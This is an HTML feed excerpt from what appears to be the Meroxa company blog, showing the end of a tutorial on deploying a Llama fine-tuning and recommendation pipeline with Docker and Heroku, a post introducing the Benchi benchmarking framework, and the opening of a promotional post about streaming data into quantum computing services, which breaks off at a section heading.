    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 90.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAACjklEQVR42pWUWU8TURTH+0E0lnY6d+bemelM26G0gEQID34QTEgkERN5M2EJ1LDI0gIWA8YCiUUERNGwGJdE/Fh/z7ldiEgoPPznzMO5v7PeG3n/9Rd2SHunf/Dh5By7x79vJT6zd3quGcyKVL/8xObBCaZX1jE5X0ZhfhWFhVVM3UivUFgqY3Z1A5v7x9ghVqR69ANzr7fwMCnQ23MP0TCKWPQu4gYp3lqx2B1YdhwLaxVwcpHtwzO8WFqD65pQrgHpJCCVAWHFYIo2ba8T+yhHYGqxjO3Db4hs7p9g4uUyPCUQKAu+byNJUo5J4ARsabQESvKdmC1h6+C0BhybKyFlW8hZNrK5FNqzAVJpV1svaV+baQM4NrMEZtWBRbTbNvpMpW1HPqMzS5jRJswUtwByutw7h6SoTNcTcLin9X7aMl63hgYzpCEOKtUl4Chl2K0c9Hk+7j/Iobe3C/39Pch3hujsCuEHEkFK6SBSB7R0K1jca8e1MDp9qeS0JRB6CkHGRRj6SGc8chTI0H/Yzkrqw36gkO1Iaelepxy4SUnARb3PGjg+W4RPUTKuTZBa6bxGjo5u6pITZluzZy1L1hlKC6EQ1EMqS5ot96/llHltuhMEdQKkgzxMisxZXWQTaw6kJXCcpuzSttdK5KYb1HBa8sBCkq6k615MnXWDDEt6//Keg7BDojOv6LYI5HIK+RxPWOo+svje/guM6smPzxRrQL4uhYUyBDnHeZGpTCNB5ZKjtma0ueCNIfw3FKpucn4FWx/P6HGgz/LbHTx7PoHB4RE8GnqKgaFhDDwertnG/xVi38EnI/osM/ihibw7+o7K3jHWq5+xUtlF8U0VpY2biX35zHr1Eyr0HjLrL1SfzAAO/97mAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Dockerfile for recommendations API&quot;
        title=&quot;&quot;
        src=&quot;/static/ad75afbe97b62e9c991518495c6436f1/5a190/rec-docker.png&quot;
        srcset=&quot;/static/ad75afbe97b62e9c991518495c6436f1/772e8/rec-docker.png 200w,
/static/ad75afbe97b62e9c991518495c6436f1/e17e5/rec-docker.png 400w,
/static/ad75afbe97b62e9c991518495c6436f1/5a190/rec-docker.png 800w,
/static/ad75afbe97b62e9c991518495c6436f1/ee3fb/rec-docker.png 1144w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;5.2.1 Create a Dockerfile for the &lt;strong&gt;Training Server&lt;/strong&gt; (&lt;code class=&quot;language-text&quot;&gt;training/Dockerfile&lt;/code&gt;):&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/226151ceea1166cdee01a328d57ed214/ee3fb/train-docker.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 87.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC00lEQVR42pVUXU8TQRTt78BI2/3e6X7NlrbbChitDz6a+D8oaECIpWDQ8ECiMQX1ARWRCAWiBAkiJhLBf8XD8d6hlM+oPJzMndmdM+eee2dSq9v7hy3C+s7vw7Wdg8PV7avjaN++Qqq1/QsfN3bRXFxD820Ls+9WMPv+/zG30MKbxXUsfdkFESK19u0AkzNN3E8C3L0XI+gPEYU+ovgIoaSxDRXHZyHzAfxQ4MnMSzBX6tPXnxiZeAahd8GPNOhON0yTkYZBo21nYFkZNTJ4zTBOwP9lMl0YGZ8Cc6U43QePJxEYGiphiFI5RimJUChQXJLI9/gQOROeb8H3bTiuDtvROuA5Ew+NNZR1qcXP31GjicxmcTPno5gPUSQiP3AQRkKRmXYWVhunyU4T1h7VwVyKcHBsHIGeQa8jEDkWCkRo2xqll1YkvOm0suP5MdiGC4Qu+SRJURTnIKVAoRgijj0qhoArdHgepe1R2oFNqVtqzuumlYVuXEdtdPyEcIAI+zImqvke9N+6gWq1H7erfeRljN6+EnrIT0aOCIPQpcOiDmKqtEsqB84qbMDV04hIYY5O5k28mdPhWJLqSObaxbFp7nXAPrMNA+dTjrjKkY+Eqlyp5JEkkhRKNTIJ+8kb2VOOTSvT8fhCyqzQ0bsReg680KZTHaVKkipWyMrOV/avRamRwtgycIf6sBwXqXUSCKGpArCSy9rlH23TgEUKI5eqJ8g/kWunxzhqF66maWkXyC8S0qVmhXkjiyRPjZ3YqJRdhJR6qSRQToQa49gkCwyywmqnmVZXkg/QtGsYVIR0U5Y2fqi77Nv0c0R9F7tUUVcVIggdFUtak9Jtx4K+OdQFtgLHLnk83JgCcylCfobq08/xsD6FwdEJqtgE2TCpxsvA3xhDhOH6UzSmX6BJz94S3+XlrT18oNznlzfxit61uYXVK+E1vaPzK5uU7g5WtvbwB6rLzaaHn3dhAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Dockerfile for the training API&quot;
        title=&quot;&quot;
        src=&quot;/static/226151ceea1166cdee01a328d57ed214/5a190/train-docker.png&quot;
        srcset=&quot;/static/226151ceea1166cdee01a328d57ed214/772e8/train-docker.png 200w,
/static/226151ceea1166cdee01a328d57ed214/e17e5/train-docker.png 400w,
/static/226151ceea1166cdee01a328d57ed214/5a190/train-docker.png 800w,
/static/226151ceea1166cdee01a328d57ed214/ee3fb/train-docker.png 1144w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;5.3. Deploying to Heroku&lt;/h3&gt;
&lt;p&gt;Use the following CLI commands to deploy your API endpoints via Docker to Heroku:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/68e24fb0cc7bdf83b13c2c853cbef45a/73caa/heroku-deploy.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 77%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACiUlEQVR42pWU204TURSG+xyGUzuHdjrttNPDzLTTk4KJ8T000egFXuCdMRGqgdQqhoLEIhSk5XyWAioEjA9TH2GS+V17l5JgUoMXf9bqmu4/31prz3hWv547q4fnWG/+JF2A5f8ndubC3Tj5hbXDi5ancXDmLO2cYLxSxatSBaOlKYy+vaHKUyiWKxifqrr1/VOsHpy1PPX9H87k/AruJ3TcK/RDTHkheHvhE3vgE3ogCL1dJYp98A7cQigccGeXt1HfO215iM4pzcwjHtMQDHqhhET4Az4EVYnUzrtKESDJA9CiqjtZXcbi9vFvT23zyHn9/iNStoFszoRlxZDNmtBjKjf9p2GgbRiOBN3S9DwWNprMsOkUyTAaCxOhCDUkUwt+KEEBAcVHEnjuD3i7G2qKO1GZ6xgeOWPlGU6Yy1tEqMO2k8hkDNiZJK/l8imkqSb726YsypemMhmGrhs2ectRPcSJFKJUOJXIiXmk1kNEziKjZbNlYs+6EqaJqHCbSNJxZLKUF1KwUjHkKbJ5MqOwJkNVZYp+GgvlIQmi1P83ITOchp21MHQ3T60xYxuDQzlq2eC1fCGNhKkhnhZg2WFansV1ZzCLRDICjZZyreXiuxkkzRgniic0GEaU57F4GCZt3TB1HiO6H7opwLCivMbmyup6XHPpcmNh85LwzeQsw4bP18NnwtpgkuT+q1yU+vgzSfJe/WbRS2dUutgTlc9twsWtY4e5R/QwN7jaIttoR2yjl7VOvbPxzj0szy6itkkXe2n7xJmureP5yyIeD4/g4dNnePBk+EZi/31EZ0ZejPFX78vOt/a7XNs6RnVlDxUy/jDXINVvqAadWcOnxq67vPsd9IFo/QGvfGer2zcJbwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Heroku Docker deploy CLI commands&quot;
        title=&quot;&quot;
        src=&quot;/static/68e24fb0cc7bdf83b13c2c853cbef45a/5a190/heroku-deploy.png&quot;
        srcset=&quot;/static/68e24fb0cc7bdf83b13c2c853cbef45a/772e8/heroku-deploy.png 200w,
/static/68e24fb0cc7bdf83b13c2c853cbef45a/e17e5/heroku-deploy.png 400w,
/static/68e24fb0cc7bdf83b13c2c853cbef45a/5a190/heroku-deploy.png 800w,
/static/68e24fb0cc7bdf83b13c2c853cbef45a/73caa/heroku-deploy.png 1110w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;Scale and Monitor Your Heroku Apps:&lt;/h4&gt;
&lt;p&gt;Your app will be available at &lt;code class=&quot;language-text&quot;&gt;https://your-app-name.herokuapp.com&lt;/code&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;For the training server, ensure the &lt;code class=&quot;language-text&quot;&gt;/trigger-training&lt;/code&gt; endpoint is accessible; for the recommendations API, use &lt;code class=&quot;language-text&quot;&gt;/recommend&lt;/code&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use the Heroku dashboard or CLI commands (e.g., &lt;code class=&quot;language-text&quot;&gt;heroku ps:scale web=1 --app your-app-name&lt;/code&gt;) to adjust the number of dynos based on your traffic requirements.&lt;/li&gt;
&lt;li&gt;Heroku provides built-in logging (&lt;code class=&quot;language-text&quot;&gt;heroku logs --tail --app your-app-name&lt;/code&gt;) and you can integrate additional monitoring tools if needed.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Repeat these steps for each service by creating separate Heroku apps or configuring them as separate processes within one app.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Congratulations! You&apos;ve just learned how to build an amazing AI pipeline that takes your model from data to deployment. Here&apos;s what we accomplished:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Built a powerful Meroxa pipeline that seamlessly handles your data - from raw files in S3 all the way through to processed JSONL format, ready for training&lt;/li&gt;
&lt;li&gt;Created a smart training server that automatically fine-tunes your Llama model when new data arrives&lt;/li&gt;
&lt;li&gt;Set up a production-ready API that serves real-time recommendations using your fine-tuned model&lt;/li&gt;
&lt;li&gt;Learned how to deploy everything to the cloud using Docker and Heroku, making your solution production-ready&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;With this setup, you now have an automated system powered by Meroxa&apos;s Conduit Platform that handles everything from data processing to model deployment. The best part? It&apos;s scalable and ready to grow with your needs.&lt;/p&gt;
&lt;p&gt;Now it&apos;s your turn to build something amazing! Happy coding! 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Benchmarking Made Simple with Benchi]]></title><description><![CDATA[Benchi is a minimal benchmarking framework designed to help you measure the performance of your applications and infrastructure. It leverages Docker to create isolated environments for running benchmarks and collecting metrics.]]></description><link>https://meroxa.com/blog/benchmarking-made-simple-with-benchi</link><guid isPermaLink="false">https://meroxa.com/blog/benchmarking-made-simple-with-benchi</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Wed, 26 Mar 2025 12:11:00 GMT</pubDate><content:encoded>&lt;p&gt;Benchmarking is one of those things every developer faces one day. It all starts with a question. What kind of load can my app handle? What&apos;s the maximum throughput of my pipeline? Is that shiny new data tool really faster than the one I&apos;m using?&lt;/p&gt;
&lt;p&gt;We&apos;re excited to introduce &lt;a href=&quot;https://github.com/conduitio/benchi&quot;&gt;&lt;strong&gt;Benchi&lt;/strong&gt;&lt;/a&gt;, a minimal yet powerful benchmarking framework that makes it easy to answer these questions. It was originally built to benchmark &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt;, but it quickly became clear that &lt;strong&gt;Benchi could work for any tool&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;Why Benchi?&lt;/h2&gt;
&lt;p&gt;Benchmarking is supposed to give you confidence. But if you&apos;ve tried benchmarking tools before, you&apos;ve probably run into this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The need to manually set up the environment.&lt;/li&gt;
&lt;li&gt;Metrics scattered across logs, dashboards, or worse — missing.&lt;/li&gt;
&lt;li&gt;No easy way to track progress or compare results across runs and tools.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Benchi fixes this. It&apos;s a framework for running and collecting benchmarks without reinventing the wheel for each project.&lt;/p&gt;
&lt;h3&gt;Key features of Benchi:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;⚙️ &lt;strong&gt;Docker-Driven&lt;/strong&gt;: Use Docker Compose to spin up isolated, reproducible benchmarking environments.&lt;/li&gt;
&lt;li&gt;📊 &lt;strong&gt;Terminal UI&lt;/strong&gt;: Real-time feedback while your benchmarks run. See metrics as they are collected.&lt;/li&gt;
&lt;li&gt;📁 &lt;strong&gt;Metrics Collection&lt;/strong&gt;: Performance data is automatically collected and saved as &lt;strong&gt;CSV&lt;/strong&gt; for further analysis. If your app exposes a Prometheus endpoint, Benchi can collect metrics from it!&lt;/li&gt;
&lt;li&gt;🪝 &lt;strong&gt;Custom Hooks&lt;/strong&gt;: Run any script or command at any stage - before, during, or after the benchmark.&lt;/li&gt;
&lt;li&gt;🔄 &lt;strong&gt;Multi-Tool Comparison&lt;/strong&gt;: Benchmark multiple tools &lt;strong&gt;under identical conditions&lt;/strong&gt; to see which one holds up.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Example: Benchmarking Conduit with Benchi&lt;/h2&gt;
&lt;p&gt;Let&apos;s say you want to benchmark &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; streaming data between two Kafka topics. We prepared an &lt;a href=&quot;https://github.com/ConduitIO/benchi/tree/main/example&quot;&gt;example&lt;/a&gt; configuration, so this can be achieved using a one-liner:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;benchi &lt;span class=&quot;token parameter variable&quot;&gt;-config&lt;/span&gt; ./example/bench-kafka-kafka/bench.yml&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running this command will do the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Run the infrastructure (Kafka) and tool (Conduit) in a clean, isolated Docker environment.&lt;/li&gt;
&lt;li&gt;Produce the test data using custom hooks.&lt;/li&gt;
&lt;li&gt;Display progress and collected metrics as the benchmark is running.&lt;/li&gt;
&lt;li&gt;Save all logs and metrics in the results folder.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/421459407-334d854d-0466-489c-bff6-95f4471b457f.gif&quot; alt=&quot;image.png&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Start Benchmarking Smarter&lt;/h2&gt;
&lt;p&gt;🚀 &lt;strong&gt;Try it now:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;go &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; github.com/conduitio/benchi@latest&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;📚 Full docs + examples: &lt;a href=&quot;https://github.com/conduitio/benchi&quot;&gt;github.com/conduitio/benchi&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Let us know what you&apos;re benchmarking and how Benchi helps you optimize it!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Quantum Computing + Meroxa: Real-Time Data Streaming for Next-Gen Innovation]]></title><description><![CDATA[Quantum computing is revolutionizing industries, but real-time data movement is the key to unlocking its full potential. This blog explores how Meroxa seamlessly streams, transforms, and integrates structured data into quantum systems like IBM Quantum, Google Cirq, and D-Wave Leap, enabling faster insights and next-gen innovation.  
 ]]></description><link>https://meroxa.com/blog/quantum-computing-meroxa-real-time-data-streaming-for-next-gen-innovation</link><guid isPermaLink="false">https://meroxa.com/blog/quantum-computing-meroxa-real-time-data-streaming-for-next-gen-innovation</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Wed, 05 Mar 2025 12:22:00 GMT</pubDate><content:encoded>&lt;h3&gt;Introduction&lt;/h3&gt;
&lt;p&gt;As &lt;strong&gt;quantum computing&lt;/strong&gt; advances from theoretical research to real-world applications, businesses across industries are seeking ways to &lt;strong&gt;integrate quantum capabilities&lt;/strong&gt; into their data ecosystems. &lt;strong&gt;Meroxa&lt;/strong&gt;, a leader in real-time data movement, is uniquely positioned to bridge the gap between &lt;strong&gt;classical computing and quantum data processing&lt;/strong&gt;, enabling seamless &lt;strong&gt;data streaming and transformation&lt;/strong&gt; for quantum workloads.&lt;/p&gt;
&lt;p&gt;This blog explores how &lt;strong&gt;Meroxa supports quantum computing&lt;/strong&gt;, its integration within &lt;strong&gt;high-performance computing (HPC) environments&lt;/strong&gt;, and the industries poised to benefit from quantum-powered analytics.&lt;/p&gt;
&lt;h3&gt;The Need for Quantum Computing in Data-Intensive Workflows&lt;/h3&gt;
&lt;p&gt;Quantum computing promises &lt;strong&gt;exponential computational power&lt;/strong&gt; over traditional computing methods, making it ideal for solving &lt;strong&gt;complex optimization, cryptography, and simulation problems&lt;/strong&gt;. However, one of the biggest challenges in quantum computing is &lt;strong&gt;feeding real-time, structured, and unstructured data into quantum systems&lt;/strong&gt; efficiently.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How does Meroxa fit in?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Ingestion&lt;/strong&gt;: Quantum algorithms require &lt;strong&gt;high-fidelity data streams&lt;/strong&gt;. Meroxa enables real-time ingestion from &lt;strong&gt;PostgreSQL, ClickHouse, Kafka, and other sources&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Transformation at Scale&lt;/strong&gt;: Quantum processors need data in a specific format. Meroxa’s &lt;strong&gt;low-latency transformation pipelines&lt;/strong&gt; prepare datasets for quantum algorithms.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hybrid Quantum-Classical Processing&lt;/strong&gt;: Industries using &lt;strong&gt;hybrid quantum-classical workflows&lt;/strong&gt; can leverage Meroxa to move data between &lt;strong&gt;traditional HPC clusters and quantum computing environments&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Meroxa + Quantum Computing: Technical Integration&lt;/h3&gt;
&lt;p&gt;Meroxa provides &lt;strong&gt;real-time data movement and preparation&lt;/strong&gt; for quantum computing workloads through &lt;strong&gt;three key components&lt;/strong&gt;:&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;1. Streaming Data to Quantum Systems&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Quantum computing is often &lt;strong&gt;batch-driven&lt;/strong&gt;, but Meroxa introduces a &lt;strong&gt;streaming-first approach&lt;/strong&gt; by integrating with quantum cloud providers such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;IBM Quantum&lt;/strong&gt; (Qiskit Runtime APIs)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Google’s Quantum AI&lt;/strong&gt; (Cirq + TensorFlow Quantum)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;D-Wave Leap&lt;/strong&gt; (Hybrid quantum-classical optimization)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example pipeline using &lt;strong&gt;Conduit Platform&lt;/strong&gt; to send &lt;strong&gt;structured data&lt;/strong&gt; to a quantum computing service:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;

&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; quantum&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
&lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; postgres&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
	    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
	    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
	    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
		    &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql://root:root@127.0.0.1:5432/testdb&quot;&lt;/span&gt;
	      &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; quantum_inputs
		    &lt;span class=&quot;token key atrule&quot;&gt;columns&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;input_params&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
		    &lt;span class=&quot;token key atrule&quot;&gt;polling_interval&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;5s&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; quantum&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;api&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
	    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
	    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;http
	    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
		    &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://api.ibmquantum.com/v1/jobs&quot;&lt;/span&gt;
		    &lt;span class=&quot;token key atrule&quot;&gt;method&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; POST
		    &lt;span class=&quot;token key atrule&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;application/json&quot;&lt;/span&gt;
		    &lt;span class=&quot;token key atrule&quot;&gt;body_template&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token scalar string&quot;&gt;
		    {
		    &quot;job_id&quot;: &quot;{{.id}}&quot;,
		    &quot;input_params&quot;: &quot;{{.input_params}}&quot;,
		    &quot;timestamp&quot;: &quot;{{.timestamp}}&quot;
		    }&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;&lt;strong&gt;2. Real-Time Data Preprocessing for Quantum Workloads&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Quantum computers require &lt;strong&gt;normalized, noise-resistant input&lt;/strong&gt;. Meroxa automates:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data normalization&lt;/strong&gt; for quantum algorithms (amplitude encoding, basis encoding).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Error correction pre-processing&lt;/strong&gt; for quantum noise reduction.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimized batch-size management&lt;/strong&gt; for quantum circuits.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example: Streaming normalized datasets into &lt;strong&gt;Google’s Cirq framework&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/quantum-Google-Cirq.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;3. Hybrid Quantum-Classical Workflows&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Many industries will operate &lt;strong&gt;hybrid architectures&lt;/strong&gt;, using &lt;strong&gt;quantum&lt;/strong&gt; for high-complexity tasks and &lt;strong&gt;classical computing&lt;/strong&gt; for traditional processing. Meroxa enables:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Event-driven data routing&lt;/strong&gt; between &lt;strong&gt;HPC clusters and quantum machines&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Parallel job execution&lt;/strong&gt;, reducing compute bottlenecks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hybrid orchestration&lt;/strong&gt;, ensuring seamless transition between &lt;strong&gt;classical and quantum environments&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example: Managing hybrid workflows with &lt;strong&gt;D-Wave Leap&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/quantum-dwave-leap.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Meroxa Quantum Computing Workflow Visualization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;To illustrate how Meroxa integrates with quantum computing, consider the following workflow:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/quantum-industries.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Industries Leveraging Quantum Computing with Meroxa&lt;/h3&gt;
&lt;h4&gt;&lt;strong&gt;1. Financial Services: Risk Analysis &amp;#x26; Fraud Detection&lt;/strong&gt;&lt;/h4&gt;
